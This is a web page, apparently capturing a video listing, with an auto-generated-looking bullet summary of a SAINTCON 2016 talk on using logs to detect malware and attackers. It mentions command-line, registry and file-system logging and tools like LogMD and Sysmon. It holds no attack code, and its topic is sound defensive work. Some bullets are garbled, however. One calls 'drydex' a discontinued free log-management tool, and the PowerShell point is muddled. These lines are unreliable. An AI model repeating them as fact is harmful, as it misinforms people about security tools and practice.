We can't find the internet
Attempting to reconnect
Something went wrong!
Hang in there while we get back on track
SAINTCON 2016 - Michael Gough - Searching Logs for Hackers : What you need to know and how to...
Log analysis is crucial in fighting malware, detects and tracks security threats, and identifies command-line, file system, and registry changes.
- Logs are a valuable asset in fighting malware, as they can help track the actions of malware and identify potential security threats.
- Most malware is not signed, so re-imaging the system is often the best course of action.
- PowerShell is a useful tool for malware researchers, but it can be difficult to detect and logs should be enabled to track its activity.
- Log management tools such as LogMD and Splunk can help organize and make sense of large volumes of log data.
- It is important to have a robust logging plan in place, including logging of command line activity, file system activity, and registry changes.
- The registry can be a valuable source of information for malware researchers, but it can also be difficult to navigate and interpret.
- Malware can use a variety of techniques to evade detection, including obfuscation, encryption, and innocent-looking file names.
- Log analysis can be a key part of the incident response process, helping to identify the scope of a breach and track the actions of attackers.
- It is important to keep logs secure and tamper-proof, as they can be a valuable source of evidence in the event of a breach.
- Effective log management can help incident responders catch attackers and limit the damage they can cause.
- LogMD is a free tool that can help manage and analyze log data, and is designed to be easy to use and effective in detecting malware.
- Sysmon is a free tool that can help track system activity and detect malware, and is compatible with LogMD.
- The death of drydex is a concern for log management, as it is no longer available as a free tool.
- Log management should be seen as a “force multiplier” in the fight against malware, allowing incident responders to detect and respond to attacks quickly and effectively.